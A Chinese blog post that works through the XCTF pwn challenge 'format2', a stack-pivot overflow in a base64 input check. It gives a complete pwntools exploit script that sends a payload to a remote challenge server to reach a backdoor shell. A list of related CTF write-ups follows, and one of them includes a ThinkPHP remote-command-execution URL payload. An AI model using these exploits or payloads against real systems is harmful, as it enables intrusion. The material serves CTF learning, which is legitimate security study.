xctf format2

最新推荐文章于 2022-03-08 20:15:00 发布
最新推荐文章于 2022-03-08 20:15:00 发布
阅读量293 收藏 1
点赞数
分类专栏: 题目 文章标签: pwn xctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/101869222
版权

日常水题的一天这个和pwnable.kr 上的一道题很像也是一道栈迁移的题目
我们直接看main函数
在这里插入图片描述
把输入的base64解密长度不能超过12
在这里插入图片描述
目的是correct函数
在这里插入图片描述
发现这里可以覆盖ebp我们就可以将栈迁移到input处然后mov esp,ebp ;
pop ebp; pop eip;main函数公用ebp控制eip为我们的后门地址直接拿到shell(打pwn不要限制于拿到shell哦)
exp:

from pwn import *
import base64
#p=process('./fmt')
p=remote('111.198.29.45',49541)
elf=ELF('./fmt')
def debug():
	gdb.attach(p)
	pause()
system_addr=0x08049284
input_addr=0x0811EB40
payload='a'*4+p32(system_addr)+p32(input_addr)
#debug()
p.sendline(base64.b64encode(payload))

p.interactive()

我虽然pwn不厉害
但是我基础的还是会一点的

doudoudedi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
format2(xctf)
weixin_43868725的博客
09-02 578
0x0 程序保护和流程 保护: 流程: main() 接收一个最长为30的字符串,通过base64解密后长度小于12就会将解密后的字符串复制到input处,之后调用auth()。 在将input中的字符串复制到v4的时候存在四个字节的溢出。如果返回值为1的话就会进入correct()。 此时如果input==0xDEADBEEF的话就能够getshell了。 0x1 利用过程 1.虽然checksec提示说程序开启了canary但是在主要逻辑上的函数都没有开启canary,所以可以进行溢出。 2.因
“攻防世界”pwnformat2
qq_42728977的博客
12-11 459
原理: 栈溢出、后门 环境: ubuntu14 工具: pwntools 、IDA 步骤: 查看程序的基本信息: 可以看出程序是32位,斌开了canary和nx 在IDA进行分析查看 看到程序并没有canary的压栈,我当时很奇怪为什么,让你后又看了几个函数,发现也没有,后来看大佬的 WP说是部分函数有,这里的canary是个迷惑。这没有canary就方便很多了。 一点一点看,发现这就是一个...
攻防世界PWNformat2题解
seaaseesa的博客
11-10 688
format2(整数地址空间溢出) 本题需要细心 首先,检测一下程序保护机制 虽然说开启了CANARY,但是关键的几个函数没有开启这个机制,这道题因为libc库静态链接到文件里,所以才造成这种干扰。 我们用IDA分析一下 后门函数 溢出点在这,memcpy传入的是v4的地址,而v4是int,最多也就8字节,因此这里可以溢出 程序的流程是将我们输入的字符串进行BASE6...
format2 攻防世界
qq_41071646的博客
07-15 660
这个题 确实很恶心 本来感觉应该是栈溢出 或者 直接验证 但是 md5 解不开 然后调试的时候逐渐发现问题 晕死,, 虽然长度那个变量是 无符号 但是 输入字符限定 30 我们也没有什么办法 来通过 这个来操作 然后进入check 函数 发现v4 可以 溢出修改ebp 并且这里有后门函数 ebp ebp ebp 栈转移 两个 leave ...
[XCTF-pwn] 22_format2
weixin_52640415的博客
03-08 207
移栈 一个移栈的小题,1:没开pie而且输入的内容放在bss中地址已知,2:程序的correct给了后门,虽然不能直接运行到但可以当后门用,3:auth函数将解码后的input复制到v4,而v4定义是ebp-8当输入大于8里就会溢出到ebp int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp+18h] [ebp-28h] BYREF char s[30]; // [esp+1Eh]
攻防世界-PWN-Format2解题过程
aptx4869_li的博客
07-24 414
# 解题思路 ## 安全机制检查 ``` healer@kali:~/Desktop/format1$ readelf -h format1 ELF Header: Magic: 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00 Class: ELF32 Data: 2's complement, little endian ...
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5.其他解法 下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 然后使用dex2jar将dex文件转换为jar文件,得到一个jar...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
writeup:xctf撰写
03-28
写上去xctf撰写
攻防世界XCTF:NaNNaNNaNNaN-Batman
末初的CSDN博客
03-07 1013
下载附件 乱码,但是根据内容大概可判别为网页文件,javascript脚本。修改后缀名为.html用浏览器打开 还是看不懂,然后把内容部分执行函数eval修改为alert,弹窗显示正常。 两种方法得到flag 第一种方法: 匹配正则,根据内容可知以 ^ 开头 $ 结尾的,拼接就可以了,注意长度==16,删除一些重复的刚刚好。 提交内容:be0f233ac7be98aa\ 第二种方法: 因为...
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3731
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
ceph format2格式image
weixin_37871174的博客
05-05 1243
1、接上篇,这创建一个format 2格式的image $rbd create rbd/format2_image_1G –image-format=2 -s 1G2、显示image元数据信息:size,order,block_name_prefix,format,features,flag $rbd info rbd/format2_image_1G rbd image ‘format2_i
攻防世界(web高手进阶区)——1~20题
weixin_43610673的博客
03-29 6692
baby_web Training-WWW-Robots php_rce ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27...
pwn 练习笔记 format2
SsMing的博客
08-16 297
例子是protostar format2 源码为: 和昨天的思路一样,确定要通过格式化字符串洞覆盖target的内容,题目的目的是要让target等于64 1.找到target的地址 2.计算偏移量 先起手个200个 我们发现第四个就是我们的ABCD,所以改一下payload 然后要是target的值为64 ,在括号之前要有64个字符,这里前面已经有34个,还差30个...
xctf社区题解2-reverse新手(新手看的,大佬绕道)
Spwpun的博客
03-31 4276
文章目录reverse-新手模式:re1: reverse-新手模式: re1: IDA中F5查看反汇编之后的C代码: 这里将输入的字符串放在变量v11中,然后与v7对比,v7和v8是连续的栈中变量,先后存放flag的一部分,找到给变量赋值的地方: 然后用python处理字符串输出: 待续… ...
python基础-格式化输出2(format用法)
XYKenny的博客
05-29 1183
相比基本格式化输出采用“%”,format()功能更强大,该函数把字符串当成一个模板,通过传入的参数进行格式化,并且使用大括号“{}”作为特殊字符代替“%”。 位置匹配 (1)不带编号,即“{}” (2)带数字编号,可调整顺序,即“{1}”、“{2}” (3)带关键字,即“{a}”、“{tom}” 格式转换 ’b‘-二进制。将数字以2为基数进行输出。 ’c‘-字符。在打印之前将整数装换成对应的Un...
2018 百越杯 pwn(format WriteUp)
X丶 的博客
12-03 776
看到题目的内容,就知道大概是格式化漏洞了, 马上扔到IDA看个究竟。 不出所料,就是printf的格式化输出漏洞   思路: 1、利用格式化漏洞覆盖任意地址的值,这里我们需要覆盖secret的值,所以先要找到secret的地址,在IDA中,可以看到secret在bss段: 得到secret的地址后,我们就可以对它的值进行覆盖,覆盖成192 2、利用%k$n(k$用于获取格式化...
攻防世界PWN之note-service2题解
seaaseesa的博客
11-10 2787
note-service2 首先看一下程序的保护机制,注意,PIE是开启的,这个checksec检测PIE有时候不准确。不过,我们看到NX是关闭的,说明堆栈的数据可以被当做指令执行 然后,我们用IDA分析一下,发现是一个很简单程序,并且只有添加和删除功能,其他功能未实现 创建这里,有三处值得我们注意 创建的堆空间大小最多为8字节 保存堆指针的数组下标可以越界 既然数组下...
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值